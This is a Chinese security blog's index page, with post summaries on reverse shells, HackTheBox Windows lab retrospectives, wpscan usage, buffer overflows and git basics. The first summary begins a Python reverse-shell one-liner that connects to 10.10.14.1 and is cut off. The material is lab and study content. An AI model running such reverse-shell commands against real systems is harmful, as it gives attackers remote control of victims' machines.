摘要: 反弹shell及其脚本 一、反弹shell的各种姿势 python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.1",44 阅读全文
posted @ 2021-11-22 01:32 mxrmiss 阅读(1487) 评论(0) 推荐(0) 编辑
摘要: Hackthebox :: optimum反思和总结 optimum是hackthebox上一台简单的windows靶机 反思 这台靶机我顺利的找到了突破口,但是msf中的post/multi/recon/local_exploiter_suggester 模块并没有用 使用别人提供的windows 阅读全文
posted @ 2021-11-22 01:27 mxrmiss 阅读(58) 评论(0) 推荐(0) 编辑
摘要: Hackthebox :: Devel反思总结 devel是hackthebox上一台简单的windows靶机,我将对其主要内容进行总结与反思 反思 对FTP服务的命令不够熟悉 对msfvenom制作载荷不够熟,msfvenom中变量lhost和lport后面接 ” = “再接参数 总结 部分FTP 阅读全文
posted @ 2021-11-22 01:25 mxrmiss 阅读(39) 评论(0) 推荐(0) 编辑
摘要: linux安装pip2 下载安装pip 2.7 curl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py python get-pip.py 设置软链接 sudo ln -s /home/kali/.local/bin/pip2 阅读全文
posted @ 2021-11-22 01:05 mxrmiss 阅读(2312) 评论(0) 推荐(0) 编辑
摘要: Hackthebox :: Legacy 反思总结 注意,这不是完整的渗透过程,只是总结 反思 这是一台windows XP的靶机,难易程度为简单,但是我却犯了很多错误 nmap查看靶机的漏洞我只是使用了一次,导致原来的两个漏洞只是扫出来了一个漏洞 扫描漏洞的时候没有准确的扫描,虽然结果是一样的,但 阅读全文
posted @ 2021-11-21 13:50 mxrmiss 阅读(58) 评论(0) 推荐(0) 编辑
摘要: Git基础使用 Git 初始化 # 设置github昵称 git config --global user.name 'mxrmiss' # 设置github邮箱 git config --global user.email 'heroli520@outlook.com' git status 无法 阅读全文
posted @ 2021-11-21 12:44 mxrmiss 阅读(53) 评论(0) 推荐(0) 编辑
摘要: wpscan 简单介绍wpscan的常用方法 --url 网站url --disable-tls-checks 不做TLS检查,https协议绕过 --api-token 令牌,需在官网获得,没令牌看不到插件漏洞 --plugins-detection 三个可选项:mixed, passive(默认 阅读全文
posted @ 2021-11-21 12:24 mxrmiss 阅读(790) 评论(0) 推荐(0) 编辑
摘要: 缓冲区溢出流程 一、Immunity Debugger 最好以管理员的身份运行Innunity debugger 通常有两种方法可以使用 Immunity Debugger 来调试应用程序: 确保应用程序正在运行,打开 Immunity Debugger,然后使用File -> Attach调试器攻 阅读全文
posted @ 2021-11-21 12:22 mxrmiss 阅读(254) 评论(0) 推荐(0) 编辑
摘要: 博客公告 / soulblog 一、博客涉及领域 信息安全,计算机网络及操作系统等 二、博客更新 每周一和周六定时更新 三、说明 该博客上的所有文章都将在博客园、CSDN和Medium上持续,同步更新 博客环境安全,无任何诱导链接,博客坚持无广告化,不会投放任何广告 所有文章均为原创,转载请注明出处 阅读全文
posted @ 2021-11-20 21:44 mxrmiss 阅读(53) 评论(0) 推荐(0) 编辑
摘要: 多层次保证笔记文件安全的方式 对于电子版笔记,它的安全性应该得到重视,防止笔记的丢失是非常重要的事情,于是,我们就需要对笔记进行多重备份。笔记类型的选择有多种,无论是选择OneNote,有道云或印象笔记这种云笔记,还是使用markdown,word或pdf这种离线的文件,单方面使用都是不安全的。因此 阅读全文
posted @ 2021-11-20 21:42 mxrmiss 阅读(373) 评论(2) 推荐(0) 编辑